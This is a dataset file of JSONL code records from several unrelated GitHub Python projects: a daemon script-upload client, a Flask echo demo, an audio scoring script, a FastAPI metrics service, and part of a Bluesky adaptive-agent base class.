+{"seq_id":"5695825807","text":"from typing import Dict, List, Union\nfrom tabulate import tabulate\n\n\nasync def upload_script(self, name, crontab=None, file_name=None, script_contents=None):\n \"\"\"\n Uploads a script to the daemon instance.\n\n :async:\n :param name: The name the script should be referred to by on the daemon.\n :param crontab: (Optional) A crontab to run the script on. For help writing a crontab try https://crontab.guru/\n :param file_name: (Optional) A file name, relative to the current working directory, to upload to the daemon.\n If not provided, `script_contents` is required. The file must be UTF-8 encoded.\n :param script_contents: (Optional) A eval-able python string to send to the daemon as a script. If not provided,\n `file_name` is requied.\n :return: Response message from the daemon\n \"\"\"\n if file_name and script_contents:\n raise Exception(\n \"MSA API - upload_script - cannot provide file_name and script_contents\"\n )\n\n if file_name:\n with open(file_name, \"rb\") as f:\n try:\n script_contents = f.read().decode(\"utf-8\")\n except:\n raise Exception(\n \"MSA API - upload_script - failed to decode file, expects utf-8 encoding.\"\n )\n\n if crontab is not None:\n payload = {\"name\": name, \"script_contents\": script_contents, \"crontab\": crontab}\n else:\n payload = {\"name\": name, \"script_contents\": script_contents}\n\n response = await self.client.post(\"/scripting/script\", payload=payload)\n\n if response.status != \"success\":\n raise Exception(response.json[\"message\"])\n\n\nasync def list_scripts(self) -> None:\n \"\"\"\n Prints scripts that have been uploaded to the deamon.\n\n :param self:\n :return:\n :rtype: None\n \"\"\"\n\n response = await self.client.get(\"/scripting/script\")\n\n if response.status != \"success\":\n raise Exception(response.json[\"message\"])\n\n scripts = response.json[\"scripts\"]\n\n print(tabulate(scripts, tablefmt=\"fancy_grid\", headers=\"keys\"))\n\n\nasync def get_scripts(self) -> List[Dict]:\n \"\"\"\n Fetches scripts uploaded to the daemon and returns them as a list of objects\n\n :param self:\n :return:\n \"\"\"\n\n response = await self.client.get(\"/scripting/script\")\n\n if response.status != \"success\":\n raise Exception(response.json[\"message\"])\n\n scripts = response.json[\"scripts\"]\n return scripts\n\n\nasync def get_script(self, name: str) -> Union[Dict, None]:\n \"\"\"\n Fetches a script uploaded to the daemon and returns them as a list of objects\n\n :param self:\n :param name: The name of the script to fetch.\n :type name: :class:`str`\n :return: The script and metadata associated with the requested script. None if the script was not found.\n :rtype: :class:`Dict` or :class:`NoneType`\n \"\"\"\n\n response = await self.client.get(f\"/scripting/script/{name}\")\n\n if response.status != \"success\":\n raise Exception(response.json[\"message\"])\n\n return response.json[\"script\"]\n\n\nasync def print_script(self, name: str) -> Union[Dict, None]:\n \"\"\"\n Fetches a script uploaded to the daemon and prints its details.\n\n :param self:\n :param name: The name of the script to fetch.\n :type name: :class:`str`\n :rtype: :class:`NoneType`\n \"\"\"\n\n response = await self.client.get(f\"/scripting/script/{name}\")\n\n if response.status != \"success\":\n raise Exception(response.json[\"message\"])\n\n script = response.json[\"script\"]\n\n script = [\n [\"Id\", script[\"id\"]],\n [\"Name \", script[\"name\"]],\n [\"Created\", script[\"created\"]],\n [\"Last Edited\", script[\"last_edited\"]],\n [\"Last Run\", script[\"last_run\"]],\n [\"Currently Running\", \"Yes\" if script[\"running\"] else \"No\"],\n [\"Crontab\", script[\"crontab\"]],\n [\n \"Scheduled For\",\n script[\"scheduled_for\"] if script[\"scheduled_for\"] else \"N/A\",\n ],\n [\"Content\", script[\"content\"]],\n ]\n\n print(tabulate(script, tablefmt=\"fancy_grid\"))\n\n\nasync def delete_script(self, name: str) -> Union[Dict, None]:\n \"\"\"\n Deletes a script uploaded to the daemon, stopping it if it was running, and cancelling it if it was scheduled\n to run.\n\n :param self:\n :param name: The name of the script to delete.\n :type name: :class:`str`\n :return:\n :rtype: None\n \"\"\"\n\n response = await self.client.delete(f\"/scripting/script/{name}\")\n\n if response.status != \"success\":\n raise Exception(response.json[\"message\"])\n\n data = response.json\n\n if data[\"status\"] == \"failure\":\n raise Exception(data[\"reason\"])\n\n return\n\n\ndef register_endpoints(api_binder):\n api_binder.register_method()(upload_script)\n api_binder.register_method()(list_scripts)\n api_binder.register_method()(get_scripts)\n api_binder.register_method()(get_script)\n api_binder.register_method()(print_script)\n api_binder.register_method()(delete_script)\n","repo_name":"MichaelGrabinski/moe-serifu-agent","sub_path":"python/msa/builtins/scripting/client_api.py","file_name":"client_api.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"7589545367","text":"\"\"\"\nMinimal Flask + forms demo\n\nSend HTML page that echoes message from HTTP request\nTo get started, point browser at echo_flask.html\n\"\"\"\n\nfrom flask import Flask, request\n\n# no need for template here - just a constant string\nform_page = \"\"\"\nEcho request\n\n\n\nMessage: \n\n\n\n\n\"\"\"\n\n# No need for message page\n# Flask converts view function return string to HTML page\n\napp = Flask(__name__)\n\napp.debug = True # development only - remove on production machines\n\n# View functions generate HTTP responses including HTML pages and headers\n\n@app.route('/echo_flask.html')\ndef form():\n return form_page\n\n@app.route('/echo_flask.py')\ndef message_page():\n # Flask Quickstart suggests request.form should work, but here it is empty\n # Flask converts return string to HTML page\n return 'Message: %s' % request.args['message']\n\n# No function needed for other routes - Flask will send 404 page\n\nif __name__ == '__main__':\n app.run()\n\n","repo_name":"AbdulAbulbulAmir/uw_python","sub_path":"week7/echo_flask.py","file_name":"echo_flask.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"7340655801","text":"from scipy.io import wavfile\nfrom scipy.stats import pearsonr\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sys import argv\nfrom pathlib import Path\nfrom features import features\n\ndef scores(samples1, freq1, samples2, freq2, samples3, freq3, q1=None, q2=None, return_score=False):\n\n sentence = features(samples1, freq1).transpose()\n query1 = features(samples2, freq2).transpose()\n query2 = features(samples3, freq3).transpose()\n\n score_list1 = []\n for pp in range(0, sentence.shape[0]-query1.shape[0], 5):\n score = 0\n for n in range(query1.shape[0]):\n score += pearsonr(query1[n], sentence[pp+n])[0]\n score_list1.append(score/query1.shape[0])\n\n score_list2 = []\n for pp in range(0, sentence.shape[0]-query2.shape[0], 5):\n score = 0\n for n in range(query2.shape[0]):\n score += pearsonr(query2[n], sentence[pp+n])[0]\n score_list2.append(score/query2.shape[0])\n\n #print(len(score_list1), '\\t', len(score_list2))\n\n t1 = np.arange(len(score_list1))/100*5\n t2 = np.arange(len(score_list2))/100*5\n \n fig = plt.figure(figsize=(8,2))\n plt.plot(t1, score_list1, t2, score_list2)\n if q1 != None and q2 != None:\n plt.legend([q1, q2])\n else:\n plt.legend(['query1', 'query2'])\n plt.gca().set_xlabel('t')\n plt.gca().set_ylabel('scores')\n plt.gca().set_xlim(left=0)\n plt.gca().set_ylim(bottom=0)\n plt.tight_layout()\n if __name__ == '__main__':\n plt.savefig(path1.stem + '_score.pdf')\n elif return_score == True:\n return score_list1, score_list2\n else:\n return fig\n\nif __name__ == '__main__':\n path1 = Path(argv[1])\n\n try:\n path2 = Path(argv[2])\n path3 = Path(argv[3])\n\n except:\n path2 = Path('queries/q1.wav')\n path3 = Path('queries/q2.wav')\n\n freq1, samples1 = wavfile.read(path1)\n freq2, samples2 = wavfile.read(path2)\n freq3, samples3 = wavfile.read(path3)\n # normalizacia\n samples1 = samples1 / 2**15\n samples2 = samples2 / 2**15\n samples3 = samples3 / 2**15\n\n scores(samples1, freq1, samples2, freq2, samples3, freq3)\n","repo_name":"adokitkat/vut-fit-iss","sub_path":"src/scores.py","file_name":"scores.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"29733768031","text":"import logging\nfrom typing import List, Optional\nfrom fastapi import Depends, FastAPI, HTTPException, Request, Response\nfrom pydantic.errors import PydanticValueError\nfrom pydantic.utils import import_string\nfrom sqlalchemy.orm import Session\nfrom app import crud, models, schemas\nfrom app.database import SessionLocal, engine\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom app.utils import get_logger\n\nlogger = get_logger(__name__)\n\n\nmodels.Base.metadata.create_all(bind=engine)\n\napp = FastAPI(title=\"User Data Metric(s) collector\", description=\"collects data for various matrics related to user\")\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n\n@app.middleware(\"http\")\nasync def db_session_middleware(request: Request, call_next):\n response = Response(\"Internal server error\", status_code=500)\n try:\n request.state.db = SessionLocal()\n response = await call_next(request)\n finally:\n request.state.db.close()\n return response\n\n\n# Dependency\ndef get_db(request: Request):\n return request.state.db\n\n@app.get(\"/health\")\ndef health():\n logger.info({\"message\": \"ok!\"})\n return {\"message\": \"ok!\"}\n\n@app.post(\"/users/\", response_model=schemas.User)\ndef create_user(user: schemas.UserCreate, db: Session = Depends(get_db)) -> Optional[models.User]:\n db_user = crud.get_user_by_email(db, email=user.email)\n if db_user:\n raise HTTPException(status_code=400, detail=\"Email already registered\")\n return crud.create_user(db=db, user=user)\n\n\n@app.get(\"/users/\", response_model=List[schemas.User])\ndef read_users(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)) -> Optional[List[models.User]]:\n \n users = crud.get_users(db, skip=skip, limit=limit)\n return users\n\n\n@app.get(\"/users/{user_id}\", response_model=schemas.User)\ndef read_user(user_id: int, db: Session = Depends(get_db)) -> Optional[models.User]:\n db_user = crud.get_user(db, user_id=user_id)\n if db_user is None:\n raise HTTPException(status_code=404, detail=\"User not found\")\n return db_user\n\n@app.post(\"/users/metrics/\", response_model=schemas.MetricCreate)\ndef create_metric_for_user(\n metric: schemas.MetricCreate, db: Session = Depends(get_db)\n) -> Optional[models.Metric]:\n return crud.create_user_metric(db=db, metric=metric)\n\n@app.get(\"/metrics/\", response_model=List[schemas.Metric])\ndef read_metrices(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)) -> Optional[List[models.Metric]]:\n metrics = crud.get_metrics(db, skip=skip, limit=limit)\n return metrics\n\n@app.get(\"/tags/\", response_model=List[schemas.Tag])\ndef get_tags(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)) -> Optional[List[models.Tag]]:\n tags = crud.get_tags(db, skip=skip, limit=limit)\n return tags\n\n@app.get(\"/tags/{tag_id}\", response_model=schemas.Tag)\ndef get_tag(tag_id: int,db: Session = Depends(get_db)) -> Optional[models.Tag]:\n db_tag = crud.get_tag(db, tag_id=tag_id)\n if db_tag is None:\n raise HTTPException(status_code=404, detail=\"Tag not found\")\n return db_tag\n\n@app.post(\"/tags/\", response_model=schemas.Tag)\ndef create_tag(tag: schemas.TagCreate, db: Session = Depends(get_db)) -> Optional[models.Tag]:\n db_tag = crud.get_tag_by_display_name(db, display_name=tag.display_name)\n if db_tag:\n raise HTTPException(status_code=400, detail=\"Tag already registered\")\n return crud.add_tag(db=db, tag=tag)\n\n@app.get(\"/metric_types/\", response_model=List[schemas.MetricType])\ndef get_metric_types(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)) -> Optional[List[models.MetricType]]:\n metric_types = crud.get_metric_types(db, skip=skip, limit=limit)\n return metric_types\n\n@app.get(\"/metric_types/{metric_type_id}\", response_model=schemas.MetricType)\ndef get_metric_types(metric_type_id: int,db: Session = Depends(get_db)) -> Optional[models.MetricType]:\n metric_type = crud.get_metric_type(db, metric_type_id=metric_type_id)\n if metric_type is None:\n raise HTTPException(status_code=404, detail=\"Tag not found\")\n return metric_type\n\n@app.post(\"/metric_types/\", response_model=schemas.MetricType)\ndef create_metric_type(metric: schemas.MetricTypeCreate, db: Session = Depends(get_db)) -> Optional[models.MetricType]:\n db_metric_type = crud.get_metric_type_by_type_name(db, type_name=metric.type_name)\n if db_metric_type:\n raise HTTPException(status_code=400, detail=\"Metric Type already registered\")\n return crud.add_metric_type(db=db, metric_type=metric)\n","repo_name":"theRuthless/mini_assignment_hashedin","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6755637230","text":"import copy\nimport inspect\nimport sys\nimport threading\nimport time as ttime\nimport uuid\nfrom abc import ABC, abstractmethod\nfrom argparse import ArgumentParser, RawDescriptionHelpFormatter\nfrom logging import getLogger\nfrom typing import Callable, Dict, Iterable, List, Literal, Optional, Sequence, Tuple, TypedDict, Union\n\nimport msgpack\nimport numpy as np\nimport tiled\nfrom bluesky_kafka import Publisher, RemoteDispatcher\nfrom bluesky_queueserver_api import BPlan\nfrom bluesky_queueserver_api.api_threads import API_Threads_Mixin\nfrom databroker.client import BlueskyRun\nfrom event_model import compose_run\nfrom numpy.typing import ArrayLike\nfrom xkcdpass import xkcd_password as xp\n\nfrom ..adjudicators.msg import DEFAULT_NAME as ADJUDICATOR_STREAM_NAME\nfrom ..adjudicators.msg import AdjudicatorMsg, Suggestion\nfrom ..server import register_variable, start_task\n\nlogger = getLogger(\"bluesky_adaptive.agents\")\nPASSWORD_LIST = xp.generate_wordlist(wordfile=xp.locate_wordfile(), min_length=3, max_length=6)\n\n\nclass AgentConsumer(RemoteDispatcher):\n def __init__(\n self,\n *,\n topics,\n bootstrap_servers,\n group_id,\n agent=None,\n consumer_config=None,\n polling_duration=0.05,\n deserializer=msgpack.loads,\n ):\n \"\"\"Dispatch documents from Kafka to bluesky callbacks, modified for agent usage.\n This allows subscribing the dispatcher to an on-stop protocol for agents to be told about\n new Bluesky runs. It also provides an interface to trigger changes to the agent using the same\n Kafka topics.\n\n Parameters\n ----------\n topics : list\n List of topics as strings such as [\"topic-1\", \"topic-2\"]\n bootstrap_servers : str\n Comma-delimited list of Kafka server addresses as a string such as ``'127.0.0.1:9092'``\n group_id : str\n Required string identifier for Kafka Consumer group\n agent : Agent\n Instance of the agent to send directives to. Must be set to send directives.\n consumer_config : dict\n Override default configuration or specify additional configuration\n options to confluent_kafka.Consumer.\n polling_duration : float\n Time in seconds to wait for a message before running function work_while_waiting.\n Default is 0.05.\n deserializer : function, optional\n optional function to deserialize data. Default is msgpack.loads.\n \"\"\"\n super().__init__(topics, bootstrap_servers, group_id, consumer_config, polling_duration, deserializer)\n self._agent = agent\n\n def _agent_action(self, topic, doc):\n \"\"\"Exposes agent methods via the kafka topic.\n This allows bluesky plans, or adjudicators to interface with agent hyperparameters or settings.\n\n Parameters\n ----------\n topic : str\n the Kafka topic of the message containing name and doc\n doc : dict\n agent document expecting\n {\n 'action': 'method_name',\n 'args': [arg1,arg2,...],\n 'kwargs': {kwarg1:val1, kwarg2:val2}\n }\n\n Returns\n -------\n continue_polling : bool\n \"\"\"\n action = doc[\"action\"]\n args = doc[\"args\"]\n kwargs = doc[\"kwargs\"]\n try:\n getattr(self._agent, action)(*args, **kwargs)\n except AttributeError as e:\n logger.error(\n f\"Unavailable action sent to agent {self._agent.instance_name} on topic: {topic}\\n\" f\"{e}\"\n )\n except TypeError as e:\n logger.error(\n f\"Type error for {action} sent to agent {self._agent.instance_name} on topic: {topic}\\n\"\n f\"Are you sure your args and kwargs were appropriate?\\n\"\n f\"Args received: {args}\\n\"\n f\"Kwargs received: {kwargs}\\n\"\n f\"Expected signature: {inspect.signature(getattr(self.agent, action))}\\n\"\n f\"{e}\"\n )\n return True\n\n def process_document(self, consumer, topic, name, doc):\n \"\"\"\n Processes bluesky documents.\n Optionally\n Sends bluesky document to RemoteDispatcher.process(name, doc)\n If this method returns False the BlueskyConsumer will break out of the\n polling loop.\n\n Parameters\n ----------\n topic : str\n the Kafka topic of the message containing name and doc\n name : str\n bluesky document name: `start`, `descriptor`, `event`, etc.\n doc : dict\n bluesky document\n\n Returns\n -------\n continue_polling : bool\n return False to break out of the polling loop, return True to continue polling\n \"\"\"\n if name == self._agent.instance_name:\n return self._agent_action(topic, doc)\n else:\n return super().process_document(consumer, topic, name, doc)\n\n def set_agent(self, agent):\n self._agent = agent\n\n\nclass DataKeys(TypedDict):\n dtype: str\n dtype_str: str\n dtype_descr: list\n shape: list\n\n\ndef infer_data_keys(doc: dict) -> DataKeys:\n data_keys = dict()\n _bad_iterables = (str, bytes, dict)\n _type_map = {\n \"number\": (float, np.floating, complex),\n \"array\": (np.ndarray, list, tuple),\n \"string\": (str,),\n \"integer\": (int, np.integer),\n }\n for key, val in doc.items():\n if isinstance(val, Iterable) and not isinstance(val, _bad_iterables):\n dtype = \"array\"\n else:\n for json_type, py_types in _type_map.items():\n if isinstance(val, py_types):\n dtype = json_type\n break\n else:\n raise TypeError()\n arr_val = np.asanyarray(val)\n arr_dtype = arr_val.dtype\n data_keys[key] = dict(\n dtype=dtype,\n dtype_str=arr_dtype.str,\n dtype_descr=arr_dtype.descr,\n shape=list(arr_val.shape),\n source=\"agent\",\n )\n return data_keys\n\n\nclass Agent(ABC):\n \"\"\"Abstract base class for a single plan agent. These agents should consume data, decide where to measure next,\n and execute a single type of plan (something akin to move and count).\n Alternatively, these agents can be used for soley reporting.\n\n Base agent sets up a kafka subscription to listen to new stop documents, a catalog to read for experiments,\n a catalog to write agent status to, a kafka publisher to write agent documents to,\n and a manager API for the queue-server. Each time a stop document is read,\n the respective BlueskyRun is unpacked by the ``unpack_run`` method into an independent and dependent variable,\n and told to the agent by the ``tell`` method.\n\n Children of Agent should implment the following, through direct inheritence or mixin classes:\n Experiment specific:\n - measurement_plan\n - unpack_run\n Agent specific:\n - tell\n - ask\n - report (optional)\n - name (optional)\n\n Parameters\n ----------\n kafka_consumer : AgentConsumer\n Consumer (subscriber) of Kafka Bluesky documents. It should be subcribed to the sources of\n Bluesky stop documents that will trigger ``tell``.\n AgentConsumer is a child class of bluesky_kafka.RemoteDispatcher that enables\n kafka messages to trigger agent directives.\n kafka_producer : Optional[Publisher]\n Bluesky Kafka publisher to produce document stream of agent actions for optional Adjudicator.\n tiled_data_node : tiled.client.node.Node\n Tiled node to serve as source of data (BlueskyRuns) for the agent.\n tiled_agent_node : tiled.client.node.Node\n Tiled node to serve as storage for the agent documents.\n qserver : bluesky_queueserver_api.api_threads.API_Threads_Mixin\n Object to manage communication with Queue Server\n agent_run_suffix : Optional[str], optional\n Agent name suffix for the instance, by default generated using 2 hyphen separated words from xkcdpass.\n metadata : Optional[dict], optional\n Optional extra metadata to add to agent start document, by default {}\n ask_on_tell : bool, optional\n Whether to ask for new points every time an agent is told about new data.\n To create a truly passive agent, it is best to implement an ``ask`` as a method that does nothing.\n To create an agent that only suggests new points periodically or on another trigger, ``ask_on_tell``\n should be set to False.\n By default True\n Can be adjusted using ``enable_continuous_suggesting`` and ``disable_continuous_suggesting``.\n direct_to_queue : Optional[bool], optional\n Whether the agent suggestions will be placed directly on the queue. If false,\n the suggestions will be sent to a Kafka topic for an Adjudicator to process.\n By default True\n Can be adjusted using ``enable_direct_to_queue`` and ``disable_direct_to_queue``.\n report_on_tell : bool, optional\n Whether to create a report every time an agent is told about new data.\n By default False.\n Can be adjusted using ``enable_continuous_reporting`` and ``disable_continuous_reporting``.\n default_report_kwargs : Optional[dict], optional\n Default kwargs for calling the ``report`` method, by default None\n queue_add_position : Optional[Union[int, Literal["front", "back"]]], optional\n Starting postion to add to the queue if adding directly to the queue, by default \"back\".\n endstation_key : Optional[str]\n Optional string that is needed for Adjudicator functionality. This keys the qserver API instance to\n a particular endstation. This way child Agents can maintain multiple queues for different unit operations.\n For example, this could be a beamline three letter acronym or other distinct key.\n \"\"\"\n\n def __init__(\n self,\n *,\n kafka_consumer: AgentConsumer,\n tiled_data_node: tiled.client.node.Node,\n tiled_agent_node: tiled.client.node.Node,\n qserver: API_Threads_Mixin,\n kafka_producer: Optional[Publisher],\n agent_run_suffix: Optional[str] = None,\n metadata: Optional[dict] = None,\n ask_on_tell: Optional[bool] = True,\n direct_to_queue: Optional[bool] = True,\n report_on_tell: Optional[bool] = False,\n default_report_kwargs: Optional[dict] = None,\n queue_add_position: Optional[Union[int, Literal[\"front\", \"back\"]]] = None,\n endstation_key: Optional[str] = \"\",\n ):\n logger.debug(\"Initializing agent.\")\n self.kafka_consumer = kafka_consumer\n self.kafka_consumer.set_agent(self)\n self.kafka_consumer.subscribe(self._on_stop_router)\n\n self.kafka_producer = kafka_producer\n logger.debug(\"Kafka set up successfully.\")\n\n self.exp_catalog = tiled_data_node\n logger.info(f\"Reading data from catalog: {self.exp_catalog}\")\n\n self.agent_catalog = tiled_agent_node\n logger.info(f\"Writing data to catalog: {self.agent_catalog}\")\n\n self.metadata = metadata or {}\n self.instance_name = (\n f\"{self.name}-{agent_run_suffix}\"\n if agent_run_suffix\n else f\"{self.name}-{xp.generate_xkcdpassword(PASSWORD_LIST, numwords=2, delimiter='-')}\"\n )\n self.metadata[\"agent_name\"] = self.instance_name\n\n self._ask_on_tell = ask_on_tell\n self._report_on_tell = report_on_tell\n self.default_report_kwargs = {} if default_report_kwargs is None else default_report_kwargs\n\n self._compose_run_bundle = None\n self._compose_descriptor_bundles = dict()\n self.re_manager = qserver\n self.endstation_key = endstation_key\n self._queue_add_position = \"back\" if queue_add_position is None else queue_add_position\n self._direct_to_queue = direct_to_queue\n self.default_plan_md = dict(agent_name=self.instance_name, agent_class=str(type(self)))\n self.tell_cache = list()\n try:\n self.server_registrations()\n except RuntimeError as e:\n logger.warning(f\"Agent server unable to make registrations. Continuing regardless of\\n {e}\")\n self._kafka_thread = None\n\n @abstractmethod\n def measurement_plan(self, point: ArrayLike) -> Tuple[str, List, dict]:\n \"\"\"Fetch the string name of a registered plan, as well as the positional and keyword\n arguments to pass that plan.\n\n Args/Kwargs is a common place to transform relative into absolute motor coords, or\n other device specific parameters.\n\n Parameters\n ----------\n point : ArrayLike\n Next point to measure using a given plan\n\n Returns\n -------\n plan_name : str\n plan_args : List\n List of arguments to pass to plan from a point to measure.\n plan_kwargs : dict\n Dictionary of keyword arguments to pass the plan, from a point to measure.\n \"\"\"\n ...\n\n @staticmethod\n @abstractmethod\n def unpack_run(run: BlueskyRun) -> Tuple[Union[float, ArrayLike], Union[float, ArrayLike]]:\n \"\"\"\n Consume a Bluesky run from tiled and emit the relevant x and y for the agent.\n\n Parameters\n ----------\n run : BlueskyRun\n\n Returns\n -------\n independent_var :\n The independent variable of the measurement\n dependent_var :\n The measured data, processed for relevance\n \"\"\"\n ...\n\n @abstractmethod\n def tell(self, x, y) -> Dict[str, ArrayLike]:\n \"\"\"\n Tell the agent about some new data\n Parameters\n ----------\n x :\n Independent variable for data observed\n y :\n Dependent variable for data observed\n\n Returns\n -------\n dict\n Dictionary to be unpacked or added to a document\n\n \"\"\"\n ...\n\n @abstractmethod\n def ask(self, batch_size: int) -> Tuple[Sequence[Dict[str, ArrayLike]], Sequence[ArrayLike]]:\n \"\"\"\n Ask the agent for a new batch of points to measure.\n\n Parameters\n ----------\n batch_size : int\n Number of new points to measure\n\n Returns\n -------\n docs : Sequence[dict]\n Documents of key metadata from the ask approach for each point in next_points.\n Must be length of batch size.\n next_points : Sequence\n Sequence of independent variables of length batch size\n \"\"\"\n ...\n\n def report(self, **kwargs) -> Dict[str, ArrayLike]:\n \"\"\"\n Create a report given the data observed by the agent.\n This could be potentially implemented in the base class to write document stream.\n Additional functionality for converting the report dict into an image or formatted report is\n the duty of the child class.\n \"\"\"\n\n raise NotImplementedError\n\n def tell_many(self, xs, ys) -> Sequence[Dict[str, List]]:\n \"\"\"\n Tell the agent about some new data. It is likely that there is a more efficient approach to\n handling multiple observations for an agent. The default behavior is to iterate over all\n observations and call the ``tell`` method.\n\n Parameters\n ----------\n xs : list, array\n Array of independent variables for observations\n ys : list, array\n Array of dependent variables for observations\n\n Returns\n -------\n list_of_dict\n\n \"\"\"\n tell_emits = []\n for x, y in zip(xs, ys):\n tell_emits.append(self.tell(x, y))\n return tell_emits\n\n @property\n def queue_add_position(self) -> Union[int, Literal[\"front\", \"back\"]]:\n return self._queue_add_position\n\n @queue_add_position.setter\n def queue_add_position(self, position: Union[int, Literal[\"front\", \"back\"]]):\n self._queue_add_position = position\n\n def update_priority(self, position: Union[int, Literal[\"front\", \"back\"]]):\n \"\"\"Convenience method to update the priority of a direct to queue agent\n\n Parameters\n ----------\n position : Union[int, Literal["front", "back"]]\n Position in priority for queue.\n \"\"\"\n self.queue_add_position = position\n\n @property\n def ask_on_tell(self) -> bool:\n return self._ask_on_tell\n\n @ask_on_tell.setter\n def ask_on_tell(self, flag: bool):\n self._ask_on_tell = flag\n\n @property\n def report_on_tell(self) -> bool:\n return self._report_on_tell\n\n @report_on_tell.setter\n def report_on_tell(self, flag: bool):\n self._report_on_tell = flag\n\n def enable_continuous_reporting(self):\n \"\"\"Enable agent to report each time it receives data.\"\"\"\n self.report_on_tell = True\n\n def disable_continuous_reporting(self):\n \"\"\"Disable agent to report each time it receives data.\"\"\"\n self.report_on_tell = False\n\n def enable_continuous_suggesting(self):\n \"\"\"Enable agent to suggest new points to the queue each time it receives data.\"\"\"\n self.ask_on_tell = True\n\n def disable_continuous_suggesting(self):\n \"\"\"Disable agent to suggest new points to the queue each time it receives data.\"\"\"\n self.ask_on_tell = False\n\n def enable_direct_to_queue(self):\n self._direct_to_queue = True\n\n def disable_direct_to_queue(self):\n self._direct_to_queue = False\n\n @property\n def name(self) -> str:\n \"\"\"Short string name\"\"\"\n return \"agent\"\n\n @classmethod\n def build_from_argparse(cls, parser: ArgumentParser, **kwargs):\n args = parser.parse_args()\n _kwargs = vars(args)\n _kwargs.update(kwargs)\n return cls.__init__(**_kwargs)\n\n @classmethod\n def constructor_argparser(cls) -> ArgumentParser:\n \"\"\"Convenience method to put all arguments into a parser\"\"\"\n parser = ArgumentParser(description=cls.__doc__, formatter_class=RawDescriptionHelpFormatter)\n parser.add_argument(\"--kafka-group-id\", required=True)\n parser.add_argument(\"--kafka-bootstrap-servers\", required=True)\n parser.add_argument(\"--kafka-consumer-config\", required=True)\n parser.add_argument(\"--kafka-producer-config\", required=True)\n parser.add_argument(\"--publisher-topic\", required=True)\n parser.add_argument(\"--subscription-topics\", required=True)\n parser.add_argument(\"--data-profile-name\", required=True)\n parser.add_argument(\"--agent-profile-name\", required=True)\n parser.add_argument(\"--qserver-host\", required=True)\n parser.add_argument(\"--qserver-api-key\", required=True)\n parser.add_argument(\"--metadata\")\n\n return parser\n\n def _write_event(self, stream, doc, uid=None):\n \"\"\"Add event to builder as event page, and publish to catalog\"\"\"\n if not doc:\n logger.info(f\"No doc presented to write_event for stream {stream}\")\n return\n if stream not in self._compose_descriptor_bundles:\n data_keys = infer_data_keys(doc)\n self._compose_descriptor_bundles[stream] = self._compose_run_bundle.compose_descriptor(\n name=stream, data_keys=data_keys\n )\n self.agent_catalog.v1.insert(\"descriptor\", self._compose_descriptor_bundles[stream].descriptor_doc)\n\n t = ttime.time()\n event_doc = self._compose_descriptor_bundles[stream].compose_event(\n data=doc, timestamps={k: t for k in doc}, uid=uid\n )\n self.agent_catalog.v1.insert(\"event\", event_doc)\n\n return event_doc[\"uid\"]\n\n def _add_to_queue(\n self, next_points, uid, re_manager=None, position: Optional[Union[int, Literal[\"front\", \"back\"]]] = None\n ):\n \"\"\"\n Adds a single set of points to the queue as bluesky plans\n\n Parameters\n ----------\n next_points : Iterable\n New points to measure\n uid : str\n re_manager : Optional[bluesky_queueserver_api.api_threads.API_Threads_Mixin]\n Defaults to self.re_manager\n position : Optional[Union[int, Literal['front', 'back']]]\n Defaults to self.queue_add_position\n\n Returns\n -------\n\n \"\"\"\n for point in next_points:\n plan_name, args, kwargs = self.measurement_plan(point)\n kwargs.setdefault(\"md\", {})\n kwargs[\"md\"].update(self.default_plan_md)\n kwargs[\"md\"][\"agent_ask_uid\"] = uid\n plan = BPlan(\n plan_name,\n *args,\n **kwargs,\n )\n if re_manager is None:\n re_manager = self.re_manager\n r = re_manager.item_add(plan, pos=self.queue_add_position if position is None else position)\n logger.debug(f\"Sent http-server request for point {point}\\n.\" f\"Received reponse: {r}\")\n return\n\n def _check_queue_and_start(self):\n \"\"\"\n If the queue runs out of plans, it will stop.\n That is, adding a plan to an empty queue will not run the plan.\n This will not be an issue when there are many agents adding plans to a queue.\n Giving agents the autonomy to start the queue is a risk that will be mitigated by\n only allowing the beamline scientists to open and close the environment.\n A queue cannot be started in a closed environment.\n \"\"\"\n status = self.re_manager.status(reload=True)\n if (\n status[\"items_in_queue\"] == 1\n and status[\"worker_environment_exists\"] is True\n and status[\"manager_state\"] == \"idle\"\n ):\n self.re_manager.queue_start()\n logger.info(\"Agent is starting an idle queue with exactly 1 item.\")\n\n def _ask_and_write_events(\n self, batch_size: int, ask_method: Optional[Callable] = None, stream_name: Optional[str] = \"ask\"\n ):\n \"\"\"Private ask method for consistency across calls and changes to docs streams.\n\n Parameters\n ----------\n batch_size : int\n Size of batch passed to ask\n ask_method : Optional[Callable]\n self.ask, or self.subject_ask, or some target ask function.\n Defaults to self.ask\n stream_name : Optional[str]\n Name for ask stream corresponding to `ask_method`. 'ask', 'subject_ask', or other.\n Defaults to 'ask'\n\n Returns\n -------\n next_points : list\n Next points to be sent to adjudicator or queue\n uid : str\n \"\"\"\n if ask_method is None:\n ask_method = self.ask\n docs, next_points = ask_method(batch_size)\n uid = str(uuid.uuid4())\n for batch_idx, (doc, next_point) in enumerate(zip(docs, next_points)):\n doc[\"suggestion\"] = next_point\n doc[\"batch_idx\"] = batch_idx\n doc[\"batch_size\"] = len(next_points)\n self._write_event(stream_name, doc, uid=f\"{uid}/{batch_idx}\")\n return next_points, uid\n\n def add_suggestions_to_queue(self, batch_size: int):\n \"\"\"Calls ask, adds suggestions to queue, and writes out events.\n This will create one event for each suggestion.\n \"\"\"\n next_points, uid = self._ask_and_write_events(batch_size)\n logger.info(f\"Issued ask and adding to the queue. {uid}\")\n self._add_to_queue(next_points, uid)\n self._check_queue_and_start() # TODO: remove this and encourage updated qserver functionality\n\n def 